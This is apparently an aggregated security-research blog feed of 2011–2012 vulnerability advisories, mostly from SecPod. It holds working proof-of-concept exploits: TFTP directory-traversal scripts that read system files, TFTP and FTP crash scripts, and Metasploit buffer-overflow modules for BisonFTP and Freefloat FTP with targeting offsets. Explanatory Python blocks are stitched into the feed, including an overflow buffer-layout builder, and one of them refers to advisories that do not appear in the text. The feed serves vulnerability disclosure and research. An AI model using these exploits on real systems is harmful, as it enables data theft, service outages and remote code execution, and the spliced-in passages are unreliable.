by Veerendra GG at February 28, 2012 05:04 AM

Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Dashboard Server. The vulnerability is caused due to improper validation of malicious HTTP request to Dashboard server appended with ‘?’ character, which discloses the Dashboard server’s web script physical path.

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1464

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 28, 2012 04:57 AM

February 01, 2012

SecPod Research Blog

OfficeSIP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in OfficeSIP Server. The vulnerability is caused due to improper validation of SIP/SIPS URI in the ‘To’ header of the request. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

CVE Info : CVE-2012-1008

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:26 AM

NetSarang Xlpd Printer Daemon Denial of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial of Service Vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:21 AM

Sphinix Mobile Web Server Multiple Persistent XSS Vulnerabilities

SecPod Research Team member (Prabhu S Angadi) has found Multiple Persistent Cross-Site Scripting Vulnerabilities in the Sphinix Mobile Web Server blog. The vulnerabilities are caused by improper validation of the “comment” parameter in the “/Blog/MyFirstBlog.txt” and “/Blog/AboutSomething.txt” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:14 AM

Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Multiple Persistent Cross-Site Scripting Vulnerabilities in Apache Struts. The vulnerabilities are caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.
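The stored cross-site scripting class reported here and in the Advantech WebAccess, NetArt Media Pharmacy System, Adiscon LogAnalyzer, ArticleSetup, JAMWiki and Sphinix entries above, as an added example in Python (not code from any of those products or from SecPod): three hypothetical render functions that store and redisplay a comment, and a scanner-style canary check of the kind a vulnerability scanner performs, which tells the raw echo, the correctly encoded output and the attribute-context mistake apart.

```python
import html
import re
import uuid

# Three constructed page-rendering functions stand in for a web application's
# template: each takes a stored comment and returns the HTML a later visitor
# receives. They are hypothetical, not code from any product named above.
def render_vulnerable(comment):
    return '<div class="comment">' + comment + '</div>'          # raw echo

def render_fixed(comment):
    # Encode for the HTML text context, quotes included, so the same helper
    # is also safe when the value later ends up inside an attribute.
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'

def render_attribute_context(comment):
    # Strips tags but leaves quotes intact: adequate in text, but the value
    # is placed inside an attribute, so a quote ends the attribute early.
    cleaned = comment.replace("<", "&lt;").replace(">", "&gt;")
    return '<input type="text" value="' + cleaned + '">'

def xss_canary():
    """A unique token wrapped in the characters that must not survive unencoded."""
    token = uuid.uuid4().hex[:12]
    return token, "<'\"" + token + ">"

def check_stored_xss(render):
    """Scanner-style check: submit the canary through the application's input
    path, then look at how it comes back. Verdicts: 'html-text' if < and >
    survive (tag injection), 'attribute' if a quote immediately precedes the
    token (attribute break-out), none if everything was encoded."""
    token, payload = xss_canary()
    page = render(payload)
    if token not in page:
        return {"reflected": False, "unencoded": []}
    unencoded = []
    if "<'\"" + token + ">" in page:
        unencoded.append("html-text")
    elif re.search(r"['\"]" + token, page):
        unencoded.append("attribute")
    return {"reflected": True, "unencoded": unencoded}

if __name__ == "__main__":
    for name, render in [("vulnerable", render_vulnerable),
                         ("fixed", render_fixed),
                         ("attribute context", render_attribute_context)]:
        print(f"{name:18} {check_stored_xss(render)}")
```

Using a random token rather than a fixed payload like `<script>alert(1)</script>` avoids false positives from pages that happen to contain the literal string, and checking for the quotes separately catches the common half-fix that escapes angle brackets only.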

More information can be found here.

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

by Veerendra GG at February 01, 2012 09:08 AM

December 02, 2011

SecPod Research Blog

Ipswitch TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a directory traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused by improper validation of ‘Read’ requests containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(5)                           ## don't hang forever if the server never answers
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request (opcode 1)
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    ## Reply starts with a 4-byte TFTP header (opcode 3 = DATA, block 1);
    ## opcode 5 means the server returned an ERROR instead of file data
    print rec_data.strip()

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

by Veerendra GG at December 02, 2011 06:21 AM

GoAhead WebServer Multiple Cross Site Scripting Vulnerabilities

SecPod Research Team member (Prabhu S Angadi) has found multiple cross-site scripting vulnerabilities in GoAhead WebServer. The vulnerabilities are caused by improper validation of input to the ‘name’ and ‘address’ parameters of the /goform/formTest page. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.
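As an added illustration of the GoAhead advisory (and of the same mechanism behind the other reflected and persistent XSS advisories on this page), the Python 3 snippet below is example code, not GoAhead's or SecPod's. It models a /goform/formTest handler that reflects ‘name’ and ‘address’ unescaped, the hardened version with output encoding for the HTML-body context, and the scanner-style probe that declares a parameter vulnerable only when the injected marker comes back byte-for-byte. The parameter names come from the advisory; the page markup and the probe string are constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlencode


def _params(query_string):
    """Pull name/address out of the query string (missing -> empty string)."""
    q = parse_qs(query_string, keep_blank_values=True)
    return q.get("name", [""])[0], q.get("address", [""])[0]


def form_test_vulnerable(query_string):
    """Constructed model of the vulnerable /goform/formTest page: both values
    are written into the HTML body exactly as received."""
    name, address = _params(query_string)
    return "<html><body><p>Name: %s</p><p>Address: %s</p></body></html>" % (name, address)


def form_test_fixed(query_string):
    """Same page with output encoding for the HTML-body context: <, >, &, and
    quotes become entities, so the browser renders the payload as text."""
    name, address = _params(query_string)
    return "<html><body><p>Name: %s</p><p>Address: %s</p></body></html>" % (
        html.escape(name, quote=True), html.escape(address, quote=True))


# constructed probe; any unique marker that needs < > " to be meaningful will do
PROBE = '<script>alert("secpod-xss")</script>'


def reflected_unescaped(page, probe=PROBE):
    """A parameter counts as vulnerable only if the probe survives byte-for-byte.
    An escaped echo (&lt;script&gt;...) is what the fixed page produces and is
    not exploitable in this context."""
    return probe in page


def scan(render, params=("name", "address")):
    """Scanner-style check: inject the probe into one parameter at a time and
    return the names of those that reflect it unescaped."""
    vulnerable = []
    for target in params:
        query = urlencode({p: (PROBE if p == target else "x") for p in params})
        if reflected_unescaped(render(query)):
            vulnerable.append(target)
    return vulnerable


if __name__ == "__main__":
    print("vulnerable handler:", scan(form_test_vulnerable))
    print("fixed handler:     ", scan(form_test_fixed))
```

The stored variants on this page (the “comment” parameter in Sphinix, the Struts pages) differ only in where the string comes from; the fix is the same encoding at the point of output. Marking the session cookie HttpOnly limits the cookie-theft impact the advisories describe but does not remove the injection.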

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

by Veerendra GG at December 02, 2011 06:14 AM

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a denial-of-service vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused by improper validation of WRITE/READ requests containing a long file name. The flaw can be exploited to crash the service.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : http://secpod.org/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

## File name >= 222 bytes long leads to crash
exploit = "\x90" * 2222

## "binary" is not an RFC 1350 transfer mode (netascii/octet); kept as in the original PoC
mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"

## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()

## Liveness check: a running TFTP server answers a read request with a DATA
## or an ERROR packet; no reply (timeout or ICMP port unreachable) within
## the timeout means the daemon is gone.
check = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
check.settimeout(3)
check.sendto("\x00\x01secpod.txt\x00netascii\x00", (target, port))
try:
    check.recv(1024)
    print "Remote TFTP server is still responding..."
except socket.error:
    print "Remote TFTP server port is down..."
    sys.exit(1)
finally:
    check.close()

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

by Veerendra GG at December 02, 2011 05:56 AM

September 07, 2011

SecPod Research Blog

Metasploit Module – BisonFTP Server Remote Buffer Overflow Vulnerability

SecPod Research Team member (Veerendra G.G) wrote a Metasploit module for the BisonFTP Server Remote Buffer Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in BisonFTP Server <= v3.5.
			},
			'Author'         =>
				[
					'localh0t',		# Initial PoC
					'veerendragg @ SecPod',	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'BID', '49109'],
					[ 'CVE', '1999-1510'],
					[ 'URL', 'http://secpod.org/blog/?p=384'],
					[ 'URL', 'http://www.exploit-db.com/exploits/17649'],
					[ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 388,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x0040333f, # call edx from Bisonftp.exe
							'Offset' => 1432
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
		sploit = rand_text_alpha(1028)					## Random Buffer
		sploit << "\x90" * 16						## Padding
		sploit << payload.encoded					## Encoded Payload
		sploit << "\x90" * (388 - payload.encoded.length)		## More Nops
		sploit << [target.ret].pack('V')				## Return Address
		sploit << rand_text_alpha(39)					## More Buffer

		print_status("Sending payload...")
		sock.put(sploit)

		handler
		disconnect
	end

end

We welcome any feedback or suggestions.
Cheers!
SecPod Research Team

by Veerendra GG at September 07, 2011 03:12 PM

Metasploit Module – Freefloat FTP Server APPE Command Overflow

SecPod Research Team member (Veerendra G.G) wrote a Metasploit module for the Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit : Download here.


##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Freefloat FTP Server APPE Command Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the APPE command in the Freefloat FTP server.
			},
			'Author'         =>
				[
					'veerendragg @ SecPod',	# Initial Discovery
					'veerendragg @ SecPod'	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'URL', 'http://secpod.org/blog/?p=310' ],
					[ 'URL', 'http://secpod.org/blog/?p=353' ],
					[ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
					[ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 500,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x7e429353, # jmp esp from user32.dll
							'Offset' => 246
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect_login
		print_status("Trying target #{target.name}...")
		buf = make_nops(target['Offset'])
		buf << [target.ret].pack('V')
		buf << make_nops(30)
		buf << payload.encoded

		print_status("Sending exploit buffer...")
		send_cmd( ['APPE', buf] , false )

		handler
		disconnect
	end

end

We welcome any feedback or suggestions.
Cheers!
SecPod Research Team

by Veerendra GG at September 07, 2011 01:24 PM

Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found multiple vulnerabilities in Xataface WebAuction and Xataface Librarian DB. The vulnerabilities are caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

by Veerendra GG at September 07, 2011 01:06 PM

MYRE Real Estate Software Multiple XSS and SQL Injection Vulnerabilities

SecPod Research Team member (Sooraj K.S) has found multiple XSS and SQL injection vulnerabilities in MYRE Real Estate Software. The vulnerabilities are caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.

by Veerendra GG at September 07, 2011 12:59 PM

Apache ActiveMQ Source Code Disclosure Vulnerability

SecPod Research Team member (Veerendra G.G) has found an information disclosure vulnerability in Apache ActiveMQ. The flaw is caused by an input validation error while processing URLs, which can be exploited to view the source code of a visited page and leads to further attacks.

More information on the flaws can be found here.

by Veerendra GG at September 07, 2011 12:07 PM

August 04, 2011

SecPod Research Blog

Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities

SecPod Research Team member (Veerendra G.G) has found multiple buffer overflow vulnerabilities in Freefloat FTP Server. The flaws are caused by input validation errors while processing the DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE and STAT commands. The buffer is overflowed by sending overly long command arguments, which can be exploited to execute arbitrary code or crash a vulnerable server, denying service to legitimate users.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : http://secpod.org/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)
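The three FTP overflow posts above (the BisonFTP module, the Freefloat APPE module and the Freefloat multi-command PoC) each depend on two numbers per target: the offset at which the saved return address is overwritten and the address of a jmp esp / call edx to put there. The Python 3 script below is an added example, not SecPod's code and not part of Metasploit: it reimplements the cyclic-pattern trick (pattern_create / pattern_offset) used to recover such an offset from the EIP value seen in a debugger, rebuilds both modules' buffer layouts with the offsets and return addresses they declare, and checks that the return address lands where each module says. The crash in demo_find_offset is simulated (the EIP value is read out of the pattern at a constructed offset of 246, chosen to match the Freefloat module); nothing is sent over the network.

```python
import itertools
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern_create: the sequence Aa0Aa1...Aa9Ab0... in which
    every aligned 4-byte window is unique, so whatever lands in EIP names its
    own offset in the buffer."""
    triplets = (u + l + d for u, l, d in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    return "".join(itertools.islice(triplets, length // 3 + 1))[:length].encode()


def pattern_offset(pattern, eip_value):
    """Metasploit-style pattern_offset: EIP as the debugger shows it (a
    little-endian dword) -> byte offset of those four bytes in the pattern,
    or None if the value did not come from the pattern."""
    idx = pattern.find(struct.pack("<I", eip_value))
    return None if idx < 0 else idx


def demo_find_offset():
    """The debugging step, simulated: send a 1000-byte pattern as the command
    argument, read EIP at the crash, compute the offset. Here the 'crash'
    simply reads the dword at a constructed offset of 246 (the Freefloat
    module's Offset); on a real target the debugger hands you that dword."""
    pat = cyclic_pattern(1000)
    eip_at_crash = struct.unpack("<I", pat[246:250])[0]
    return pattern_offset(pat, eip_at_crash)


def has_bad_chars(data, badchars=b"\x00\x0a\x0d"):
    """FTP commands are CRLF-terminated C strings, so NUL, LF and CR would cut
    the buffer short: the reason both modules declare them as BadChars."""
    return any(b in data for b in badchars)


def build_freefloat_appe(payload, ret=0x7e429353, offset=246, nops_after=30):
    """Freefloat APPE layout: [offset NOPs][ret = jmp esp][NOPs][payload], sent
    as the APPE argument. After the overwritten ret executes, ESP points just
    past the return address, so jmp esp lands in the NOP sled before the payload."""
    if has_bad_chars(payload):
        raise ValueError("payload contains a bad character")
    buf = b"\x90" * offset + struct.pack("<I", ret) + b"\x90" * nops_after + payload
    return b"APPE " + buf + b"\r\n"


def build_bison(payload, ret=0x0040333f, space=388):
    """BisonFTP layout: 1028 filler, 16 NOPs, payload padded to 388, the ret
    (a call edx in Bisonftp.exe, which the module relies on EDX pointing into
    the buffer for) and 39 trailing bytes; the return address therefore sits
    at offset 1028 + 16 + 388 = 1432, the module's Offset."""
    if len(payload) > space:
        raise ValueError("payload exceeds %d bytes" % space)
    if has_bad_chars(payload):
        raise ValueError("payload contains a bad character")
    return (b"A" * 1028 + b"\x90" * 16 + payload + b"\x90" * (space - len(payload))
            + struct.pack("<I", ret) + b"B" * 39)


def ret_offset(buf, ret):
    """Offset of the 4 return-address bytes in a finished buffer, to check the
    layout against the Offset the module declares."""
    return buf.find(struct.pack("<I", ret))


if __name__ == "__main__":
    print("offset recovered from simulated crash:", demo_find_offset())
    print("BisonFTP ret offset:", ret_offset(build_bison(b"\xcc" * 64), 0x0040333f))
    print("Freefloat ret offset (after 'APPE '):",
          ret_offset(build_freefloat_appe(b"\xcc" * 64), 0x7e429353) - 5)
```

The BisonFTP return address ends in a NUL byte, which is a declared bad character; it still works there because it is the last dword that needs to be intact before the trailing filler, which is why that module places the payload before the return address rather than after it as the Freefloat module does.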

We welcome any feedback or suggestions.
Cheers!
SecPod Research Team

by Veerendra GG at August 04, 2011 02:06 PM

CiscoKits TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Antu Sanadi) has found a directory traversal vulnerability in CiscoKits CCNA TFTP Server. The vulnerability is caused by improper validation of ‘Read’ requests containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : CiscoKits TFTP Server Directory Traversal Vulnerability
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory  : http://secpod.org/blog/?p=301
#             http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
#             http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt
# Version   : CiscoKits CCNA TFTP Server 1.0.0.0
# Date      : 21/07/2011
##############################################################################
import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(5)                    ## don't hang forever if the server never answers
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]                        ## The Server IP
    PORT = 69                                 ## Default TFTP port

    data = "\x00\x01"                         ## TFTP Read Request (opcode 1)
    data += "../" * 10 + "windows/win.ini" + "\x00"  ## Read windows/win.ini using directory traversal
    data += "netascii\x00"                    ## TFTP Type

    # netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    ## Reply starts with a 4-byte TFTP header (opcode 3 = DATA, block 1);
    ## opcode 5 means the server returned an ERROR instead of file data
    print rec_data.strip()

We welcome any feedback or suggestions.
Cheers!
SecPod Research Team

by Veerendra GG at August 04, 2011 01:37 PM

CiscoKits CCNA TFTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a denial-of-service vulnerability in CiscoKits CCNA TFTP Server. The vulnerability is caused by improper validation of WRITE requests containing a long file name. The flaw can be exploited to crash a vulnerable server, denying service to legitimate users.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title    : CiscoKits CCNA TFTP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor   : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory : http://secpod.org/blog/?p=271
#            http://secpod.org/SECPOD_CiscoKits_CCNA_TFTP_DoS_POC.py
#            http://secpod.org/advisories/SECPOD_Ciscokits_CCNA_TFTP_DoS.txt
# Version  : CiscoKits CCNA TFTP Server 1.0.0.0
# Date     : 21/07/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

#File name >= 222 length leads to crash
exploit = "A" * 500

mode = "netascii"
print "File name WRITE crash"
# WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"
sock.sendto(data, (target, port))
time.sleep(5)

We welcome any feedback or suggestions.
Cheers!
SecPod Research Team

by Veerendra GG at August 04, 2011 01:01 PM

Habari Installation Path Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found an information disclosure vulnerability in Habari. A direct HTTP request to certain pages discloses the full installation path, which can be used for further attacks.


More information on the flaws can be found here.

by Veerendra GG at August 04, 2011 12:44 PM

July 31, 2011

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Breaking cpau, a dummies guide

So recently I had a penetration test where the client had a requirement to allow normal users to execute a specific command as a local admin. Normally, when I hear such a requirement my eyes light up as it can often be a quick way to get SYSTEM and then the domain. However in this instance, the client proudly told me about his underhanded method. Rather than use something like psexec, he'd discovered a nifty little utility called cpau which purported to encode the credentials to make it safe for use by normal users. Red rag to a bull, I decided to take a look, perhaps the encoding was weak and I could retrieve those all important credentials....

by timb@machine.org.uk (Tim Brown) at July 31, 2011 09:33 PM

July 08, 2011

SecPod Research Blog

Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Veerendra G.G) has found a directory traversal vulnerability in Avaya IP Office Manager TFTP Server. The vulnerability is caused by improper validation of TFTP READ requests containing ‘../’ sequences, which allows attackers to read arbitrary files via directory traversal attacks and gain sensitive information.

POC : Download here.

Packet Capture : Download here.

More information can be found here.

#!/usr/bin/python
##############################################################################
# Exploit   : http://secpod.org/blog/?p=225
#             http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py
#             http://secpod.org/advisories/SecPod_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
#
# Get File content using Directory Traversal Attack
# Tested against Avaya Office IP Manager 8.1
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(5)                           ## don't hang forever if the server never answers
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request (opcode 1)
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "octet\x00"                              ## TFTP Type

    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

by Veerendra GG at July 08, 2011 07:22 AM

Andy’s PHP Knowledgebase Multiple Cross-Site Scripting Vulnerabilities

SecPod Research Team member (Sooraj K.S) has found multiple cross-site scripting vulnerabilities in Andy’s PHP Knowledgebase. The vulnerabilities are caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

by Veerendra GG at July 08, 2011 07:03 AM

appRain Quick Start Edition Core Edition Multiple Persistent Cross-Site Scripting Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found multiple persistent (stored) cross-site scripting vulnerabilities in appRain Quick Start Edition Core Edition. The vulnerabilities are caused by improper validation of various parameters. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

by Veerendra GG at July 08, 2011 06:47 AM

